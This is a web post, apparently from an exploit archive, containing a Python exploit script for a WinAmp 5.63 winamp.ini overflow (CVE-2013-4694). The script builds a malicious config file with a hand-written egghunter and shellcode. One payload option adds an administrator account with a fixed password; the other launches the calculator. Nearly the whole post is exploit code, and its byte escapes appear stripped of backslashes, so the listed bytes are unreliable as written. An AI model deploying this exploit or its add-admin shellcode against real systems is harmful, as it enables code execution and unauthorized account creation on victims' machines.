
WinAmp 5.63 winamp.ini Local Exploit

Posted on 27 August 2013

<pre># Exploit Title: winampevilskin.py # Date: 25 August 2013 # Exploit Author: Ayman Sagy &lt;aymansagy@gmail.com&gt; # Vendor Homepage: http://www.winamp.com/ # Version: 5.63 # Tested on: Windows XP Professional SP3 Version 2002 # CVE : 2013-4694 # # Ayman Sagy &lt;aymansagy@gmail.com&gt; August 2013 # # This is an exploit for Bug #1 described in http://www.exploit-db.com/exploits/26558/ # Credit for discovering the vulnerability goes to Julien Ahrens from Inshell Security # # The exploit will generate a winamp.ini file that will cause winamp to run the payload upon startup # # # I tried an alpha3 encoded egghunter but could not fit it in a single buffer and unfortunately it did not work, it wrote an invalid address on the stack then tried to access it # If you can make it work or find a solution for ASLR/DEP please contact me # # So I wrote from scratch a venetian shellcode that will write the egghunter onto the stack then executes it # The egg and shellcode can be found in plain ASCII in memory # # Tested against Windows XP Pro SP3 # Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0 # run with Python 2.7 import sys, getopt, os def usage(): print('winampevilskin.py by Ayman Sagy &lt;aymansagy@gmail.com&gt; ') print('Usage: python ' + sys.argv[0] + ' -p &lt;payload&gt;') print('Payload could be:') print(' [user] to create new admin account ayman/P@ssw0rd') print(' [calc] run calculator') print('for e.g.: python ' + sys.argv[0] + ' -p user') #appdata = os.environ['APPDATA'] # Windows add admin user: ayman P@ssw0rd scadduser = ( b&quot;xbfxabxd0x9ax5bxdaxc7xd9x74x24xf4x5ax2bxc9&quot; + &quot;xb1x45x83xc2x04x31x7ax11x03x7ax11xe2x5ex2c&quot; + &quot;x72xd2xa0xcdx83x85x29x28xb2x97x4dx38xe7x27&quot; + &quot;x06x6cx04xc3x4ax85x9fxa1x42xaax28x0fxb4x85&quot; + &quot;xa9xa1x78x49x69xa3x04x90xbex03x35x5bxb3x42&quot; + &quot;x72x86x3cx16x2bxccxefx87x58x90x33xa9x8ex9e&quot; + 
&quot;x0cxd1xabx61xf8x6bxb2xb1x51xe7xfcx29xd9xaf&quot; + &quot;xdcx48x0exacx20x02x3bx07xd3x95xedx59x1cxa4&quot; + &quot;xd1x36x23x08xdcx47x64xafx3fx32x9exd3xc2x45&quot; + &quot;x65xa9x18xc3x7bx09xeax73x5fxabx3fxe5x14xa7&quot; + &quot;xf4x61x72xa4x0bxa5x09xd0x80x48xddx50xd2x6e&quot; + &quot;xf9x39x80x0fx58xe4x67x2fxbax40xd7x95xb1x63&quot; + &quot;x0cxafx98xe9xd3x3dxa7x57xd3x3dxa7xf7xbcx0c&quot; + &quot;x2cx98xbbx90xe7xdcx34xdbxa5x75xddx82x3cxc4&quot; + &quot;x80x34xebx0bxbdxb6x19xf4x3axa6x68xf1x07x60&quot; + &quot;x81x8bx18x05xa5x38x18x0cxc6xd3x82x81x6dx54&quot; + &quot;x2exfex42xc7x90x90xf9x73xf1x19x72x19x83xc1&quot; + &quot;x15x98x0ex63xbbx7ax81x23x30x08x56x94xc4x8a&quot; + &quot;xb8xfbx69x17xfdx23x4fxb1xddx4dxeaxc9x3dxfe&quot; + &quot;x9bx52x5fx92x04xe7xf0x1fxbax27x4ex84x57x41&quot; + &quot;x3ex2dxd4xe5xccxccx6ex69x43x7cxaex14xdaxef&quot; + &quot;xcfxb8x3cxdfx4ex01x79x1f&quot; ) # http://shell-storm.org/shellcode/files/shellcode-739.php sccalc = (b&quot;x31xC9&quot;+ # xor ecx,ecx &quot;x51&quot;+ # push ecx &quot;x68x63x61x6Cx63&quot;+ # push 0x636c6163 &quot;x54&quot;+ # push dword ptr esp &quot;xB8xC7x93xC2x77&quot;+ # mov eax,0x77c293c7 &quot;xFFxD0&quot; ) if len(sys.argv) &lt; 2: usage() exit(1) try: opts, args = getopt.getopt(sys.argv[1:],'p:') except getopt.GetoptError: usage() exit(1) for opt, arg in opts: if opt == '-p': if arg == 'user': shellcode = &quot;aymnaymn&quot; + &quot;x90&quot; + &quot;x90&quot; * 100 + scadduser + &quot;x90&quot; * 89 elif arg == &quot;calc&quot;: shellcode = &quot;aymnaymn&quot; + b&quot;x90&quot; * 452 + b&quot;x90&quot; + sccalc + b&quot;x90&quot; * 23 else: print(&quot;Error: Invalid payload. 
&quot;) usage() sys.exit() #print(str(len(shellcode))) egghunter = (&quot;x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74&quot;+ &quot;xefxb8x61x79x6dx6ex8bxfaxafx75xeaxafx75xe7xffxe7&quot;) sploit = ( # Unicode-friendly venetian egghunter writer # Setup Registers &quot;x50x72x50&quot;+ # push eax twice &quot;x72&quot; + # align &quot;x59x72x5f&quot;+ # pop ecx pop edi &quot;x72&quot; + &quot;x05xc2x02x01&quot;+ # 05 00020001 ADD EAX,1000200 &quot;x72&quot;+ &quot;x2dxc2x01x01&quot;+ # 2D 00010001 SUB EAX,1000100 # EAX is now EAX+100 &quot;x72x48&quot;+ # dec eax 4 times &quot;x72x48&quot;+ &quot;x72x48&quot;+ &quot;x72x48x72&quot;+ # Pave Ahead # write NOPs in locations that will stop later execution &quot;xc3x86xc2x90&quot;+ # C600 90 MOV BYTE PTR DS:[EAX],90 &quot;x72x40x72&quot;+ # 40 INC EAX &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x90&quot;+ &quot;x72x40x72&quot;+ &quot;xc2x91&quot; # 91 XCHG EAX,ECX &quot;x72&quot; + # align # Start writing egghunter shellcode, EGG = aymn &quot;xc3x86x66&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x81&quot;+ #81 &quot;x72x40x72&quot;+ &quot;xc3x86xc3x8a&quot;+ #ca &quot;x72x40x72&quot;+ &quot;xc3x86xc3xbf&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x0f&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x42&quot;+ # 42 &quot;x72x40x72&quot;+ &quot;xc3x86x52&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x6a&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x02&quot;+ &quot;x72x40x72&quot;+ &quot;x34&quot; * 4 + # Padding &quot;xc3xb0x30&quot;+ # 0x003000F0 CALL EAX winamp.exe WinXP Pro SP3 # Note: If you add winamp as an exception to DEP 
the return address becomes 0x003100F0 instead of 0x003000F0 &quot;x72&quot; &quot;xc3x86x58&quot;+ #58 &quot;x72x40x72&quot;+ &quot;xc3x86xc3x8d&quot;+ #cd &quot;x72x40x72&quot;+ &quot;xc3x86x2e&quot;+ #2e &quot;x72x40x72&quot;+ &quot;xc3x86x3c&quot;+ # 3c &quot;x72x40x72&quot;+ &quot;xc3x86x05&quot;+ # 5 &quot;x72x40x72&quot;+ &quot;xc3x86x5a&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x74&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc3xaf&quot;+ # ef &quot;x72x40x72&quot;+ &quot;xc3x86xc2xb8&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x61&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x79&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x6d&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86x6e&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc2x8b&quot;+ &quot;x72x40x72&quot;+ &quot;xc3x86xc3xba&quot;+ #fa &quot;x72x40x72&quot;+ &quot;xc3x86xc2xaf&quot;+ # af &quot;x72x40x72&quot;+ &quot;xc3x86x75&quot;+ #75 &quot;x72x40x72&quot;+ &quot;xc3x86xc3xaa&quot;+ #ea &quot;x72x40x72&quot;+ &quot;xc3x86xc2xaf&quot;+ # af &quot;x72x40x72&quot;+ &quot;xc3x86x75&quot;+ #75 &quot;x72x40x72&quot;+ &quot;xc3x86xc3xa7&quot;+ # e7 &quot;x72x40x72&quot;+ &quot;xc3x86xc3xbf&quot;+ # ff &quot;x72x40x72&quot;+ &quot;xc3x86xc3xa7&quot;+ # e7 &quot;x72&quot;+ &quot;x57&quot;+ # 57 PUSH EDI &quot;x72&quot;+ # align &quot;xc3x83&quot;+ # C3 RETN &quot;x34&quot; * 200 # Padding ) winamp = (&quot;[Winamp] utf8=1 &quot; + &quot;skin=&quot; + sploit + &quot; &quot; &quot;[WinampReg] IsFirstInst=0 NeedReg=0 &quot; + &quot;[in_wm] numtypes=7 &quot; + &quot;type0=WMA description0=Windows Media Audio File (*.WMA) &quot; + &quot;protocol0=0 avtype0=0 &quot; + &quot;type1=WMV description1=Windows Media Video File (*.WMV) &quot; + &quot;protocol1=0 avtype1=1 type2=ASF &quot; + &quot;description2=Advanced Streaming Format (*.ASF) &quot; + &quot;protocol2=0 avtype2=1 type3=MMS:// &quot; + &quot;description3=Windows Media Stream protocol3=1 &quot; + &quot;avtype3=1 type4=MMSU:// &quot; &quot;description4=Windows Media Stream 
protocol4=1 &quot; + &quot;avtype4=1 type5=MMST:// &quot; + &quot;description5=Windows Media Stream protocol5=1 &quot; + &quot;avtype5=1 type5=&quot; + &quot;x90x90xe9x0f&quot; + &quot; description6=&quot; + shellcode + &quot; protocol6=0 avtype6=0 &quot;) #f = open(appdata + &quot;Winampwinamp.ini&quot;, &quot;wb&quot;) or sys.exit(&quot;Error creating winamp.ini&quot;) f = open(&quot;winamp.ini&quot;, &quot;wb&quot;) or sys.exit(&quot;Error creating winamp.ini&quot;) f.write(winamp) f.close() print(&quot;winamp.ini written, copy it into %APPDATA%\Winamp&quot;) </pre>

 
